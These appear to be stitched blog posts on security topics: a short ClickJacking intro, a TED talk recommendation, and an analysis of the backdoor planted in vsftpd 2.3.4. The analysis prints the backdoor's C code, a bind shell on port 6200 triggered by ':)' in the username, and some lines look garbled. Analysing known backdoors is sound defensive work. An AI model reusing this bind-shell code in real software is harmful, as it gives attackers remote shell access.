After coming across a couple of news sites reporting on ClickJacking this afternoon, I decided create a post that would demonstrate just how easily ClickJacking is done. Please be aware that this post is very high level, and not an in-depth look at the attack vector. The hope for this post is that you can demonstrate to your friends / family just how easy it is to be caught out.
For those that haven’t seen it, Mikko Hypponen (of F-Secure AntiVirus) has given a talk at TED about the future of security on the internet.
It’s an entertaining look into the world of antivirus research, with elements from malware history, as well as an interesting look at the stupidity of some malware creators.
Now if you are established in the computer security scene, you are not likely to learn anything technical from this talk, but what I enjoyed was Mikko’s enthusiasm on his pursuit of protecting the Internet.
The talk can be found at TED here
As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.
The backdoor trigger was planed within ‘str.c’:
As you can see, the code searches for bytes 0x3a and 0x29: or ‘:)’ for those who don’t like ASCII.
The vsf_sysutil_extra(); function is then inserted into sysdeputil.c as:
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0) exit(1);
if((listen(fd, 100)) == -1) exit(1);
rfd = accept(fd, 0, 0);
close(0); close(1); close(2);
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. This simply binds to port 6200 and listens forever, accepting connections and spawning a shell.